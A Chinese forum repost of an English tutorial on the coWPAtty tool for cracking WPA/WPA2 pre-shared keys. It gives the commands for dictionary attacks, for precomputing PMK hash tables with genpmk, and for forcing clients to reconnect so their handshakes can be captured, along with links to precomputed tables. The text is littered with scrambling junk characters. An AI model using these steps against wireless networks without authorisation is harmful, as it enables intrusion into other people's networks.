本帖最后由 smilebomb 于 2010-1-14 23:09 编辑 $ c8 t# Q* U8 c. p7 ?/ N5 b
0 b0 N, k7 N+ ^- J) G& d# Y本人最讨厌这种人
3 Z s+ m0 A6 w$ [coWPAtty for Windows MAIN:
4 ? M% _0 n5 e7 u1 K "coWPAtty is designed to audit the pre-shared key (PSK) selection for WPA networks based on the TKIP protocol."1 f4 O2 S# q2 x8 V! S# |
- Joshua Wright.
v- x$ z5 n( G4 X9 W! N. @4 P6 l( D. y( n# d% g% ?6 u6 p& G
Project Homepage: http://www.willhackforsushi.com/Cowpatty.html R4 J: `& r* s# B( H7 s! c0 n3 l( r4 F" W, X
, z: C, \5 ?* S+ t$ y- E
Local Mirror: Cowpatty-4.0-win32.zip' j+ p" i4 n8 l0 _8 M6 \
MD5: aa9ead2aacfcc493da3684351425d4c6 & G* L) @6 s* M& U# l! ?
; P g* r1 A! |0 k% Q) B3 `' x$ W& {. ?# t
coWPAtty Dictionary Attack 3 q- f; E! E4 N$ C( w g; R4 y: C, V1 c) N6 n
Precomputing WPA PMK to crack WPA PSK + t6 t; S5 }$ y1 K% ]
9 M. M3 m+ L; H! n, z. N; ScoWPAtty Precomputed WPA Attack - |% L/ _1 [, q
coWPAtty Recomputed WPA2 Attack + H+ d* V- T3 \- P4 H m7 K4 b# u! F$ J; M
coWPAtty Tables w$ ?7 R5 x2 E! x! U
" s% |' T6 f( V" B& WcoWPAtty Usage:6 ~$
' v5 @1 B3 C2 x. C & S: F: `8 R. A- m2 G5 ^8 Q. y- y
coWPAtty Dictionary Attack:
: N2 H. _, C) z9 C& A+ bToperform the coWPAtty dictionary attack we need to supply the tool witha capture file that includes the TKIP four-way handshake, a dictionaryfile of passphrases to guess with and the SSID for the network. ( V0 y# O" I7 }6 I- k4 u
In orderto collect the four-way handshake you can either wait until a clientjoins the network or preferably you can force it to rejoin the networkusing tools like void11 or aireplay and capture the handshakes usingsomething like kismet, ethereal or airodump.
1 L _# O4 f6 t* \" y! _cowpatty -f dict -r wpapsk-linksys.dump -s linksys
1 c! ^5 ]3 V; h' l3 y
' D3 t( M+ N" m9 I& |5 M& g/ R1 C
+ e7 }! a5 {) s& w* i$ D' @. \9 R0 P1 e
 / e" U0 T" m# [+ y
c+ @# W. O1 N9 V4 c. q8 [
4 B2 ~ K* a7 f. q. ]As youcan see this simple dictionary attack took 51 seconds, we can speed upthis process by precomputing the WPA-PMK to crack the WPA-PSK (seebelow). 0 d4 E6 I Y, L7 |% n5 j6 Y3 w8 Q
' J V6 w+ ^: t4 M% J8 w7 wwpapsk-linksys.dumpis the capture containing the four-way handshake
, E, t- Y: l' F' G1 y2 N; ndict is the password file
5 @2 x/ Z3 w, |
linksys is the network SSID ' G1 W( G( M3 S( e- z5 I
" ]( v9 j- P M5 c
Precomputing WPA PMK to crack WPA PSK:% ^. o+ O: O5 W7 S# X6 ~6 a3 L1 q
genpmkis used to precompute the hash files in a similar way to Rainbow tablesis used to pre-hash passwords in Windows LANMan attacks. There is aslight difference however in WPA in that the SSID of the network isused as well as the WPA-PSK to "salt" the hash. This means that weneed a different set of hashes for each and every unique SSID i.e. aset for "linksys" a set for "tsunami" etc.
$ i2 O; _' X' l, O6 a# _/ I; W: f4 t" f. E1 p
So to generate some hash files for a network using the SSID cuckoo we use:
7 @) @# C* G* b6 c6 L X3 w) i4 ?
, z$ W3 \8 Z, c3 N' u) a2 Q- n* U0 t1 d0 i3 w+ C" Y
; L3 z/ S- m" R9 K [genpmk -f dict -d linksys.hashfile -s linksys 8 N8 P: A* ^. X& m8 d
3 e0 X: @) {+ t' r8 @0 T
. }- d- z* z: E( C P4 n2 Q9 |5 C6 T: P' K$ O5 n) ]! h9 T" o! D \" R6 F/ H
/ v3 u/ `1 c0 y* Q; E, ~4 `
8 W* y$ j0 L2 }. y- l* B M dict is the password file ' E, R7 R i- f$ i' W$ S7 Y& e! X
( c' P' g4 d9 ^linksys.hashfile is our output file ( E7 _$ F' x( g) W! a; `" o
/ Q' T8 {% y/ X0 V s9 |3 d0 ~linksysis the network ESSID 8 p; L# C+ \' o) q5 S
# w1 w2 q0 s: @* O5 C4 N( D/ y2 p5 _) I* Y V2 j9 ]
coWPAtty Precomputed WPA Attack:- z5 |# j1 r d$ n- [! T/ V6 l3 V \
Now wehave created our hash file we can use it against any WPA-PSK networkthat is utilising a network SSID of cuckoo. Remember the capture(wpa-test-01.cap) must contain the four-way handshake to be successful. 3 u1 d; w& R \; l0 n. N* {# \8 I ~" j+ d+ v3 G0 ]; R
, _. L5 i5 R# k" D* w2 rcowpatty -d linksys.hashfile -r wpapsk-linksys.dump -s linksys
* C4 t( A, ^* Y: `0 j, T' }! O( W, L1 N0 G, ^( _/ A$ t: {+ h: i% W% Z9 I: Z l
: G$ p4 d* E, j p! S/ g2 m' d
4 c. ]" P' n5 m5 Y( B
* P0 L6 h+ A% u% x$ b5 t+ @4 Z) w( b0 d+ H" u8 s8 f5 J/ A2 ^5 c! d: |9 `& w
wpa-test-01.capis the capture containing the four-way handshake : h0 f7 J- n I; Y7 z+ N: |9 L% }
linksys.hashfile are our precomputed hashes : x" E Y. h; I: ?3 a) x, y. v+ H3 K+ Q i1 T: [3 V$ ]
linksys is the network ESSID 1 D- p$ ~6 E/ k, D
( E1 q2 L' {7 b' _6 UNotice that cracking the WPA-PSK took 0.04 seconds with the pre-computed attacked as opposed to 200 secondswith standard dictionary attack mode, albeit you do need to pre-computethe hash files prior to the attack. However, precomputing large hashfiles for common SSIDS (e.g. linksys, tsunami) would be a sensible movefor most penetration testers. : P% ?' |& W2 C1 F5 d
9 e9 s0 j/ S5 `/ A
coWPAtty Precomputed WPA2 Attack:: ~& g! |* z# E
coWPAtty4.0 is also capable of attacking WPA2 captures. Note: The same hashfile as was used with the WPA capture was also used with the WPA2capture.
% }1 D, S8 M+ ]+ l9 k; Ycowpatty -d linksys.hashfile -r wpa2psk-linksys.dump -s linksys
% F* j/ d# f6 n8 u& \, c P* I
. [8 j8 S; H: A0 N0 M) h( A4 J; _+ Q3 a1 C/ A( l9 [' X8 P8 X) [! B
: _( G; N7 c% Y* B9 z% y1 r( h: d0 e4 T5 s. h
wpa2psk-linksys.dumpis the capture containing the four-way handshake * @9 a' I+ C" D$ z* E N! o
dict is the password file
9 Y9 E5 N+ O r0 d1 ~8 ]$ jlinksys is the network SSID
# [8 l& Y$ V( f$ ?4 v
0 r& b+ z$ d, p% j/ b$ _% u: U* g) x8 g: u2 Q0 @1 u% b, R3 o! i2 W* x
coWPAtty Tables:" q# T+ c, n. p; [+ W
& Q, J4 K7 C1 y3 K! ]The Church of Wifi have produced some lookup tables for 1000 SSID's computed against a 170,000 word password file. The resultant table are approximately 7 Gigabytes in size and can be downloaded via Torrent:
# C. q$ c% T: H }2 g2 R8 B9 L# [2 _' \2 B' B/ W0 @
http://torrents.lostboxen.net/co ... atty-4.0_2006-10-19/ p+ G7 n" D4 e8 ]0 E. V( z' K$ u+ o8 I( L8 Q7 j" W
: x7 S$ l6 R, N: `! [8 n$ z5 p- J: O
A 33 Gigabyte set of tables are also available: http://umbra.shmoo.com:6969/) v" m6 o: F' Y
% \- R* _, O. ?9 Y7 ~( h0 `% e. j9 W; A. J
Or you can buy them via DVD, direct from Renderman (initiator of the project): http://www.renderlab.net/projects/WPA-tables/ | 
[复制链接]
IP卡
狗仔卡
发表于 2010-1-10 01:59
显身卡
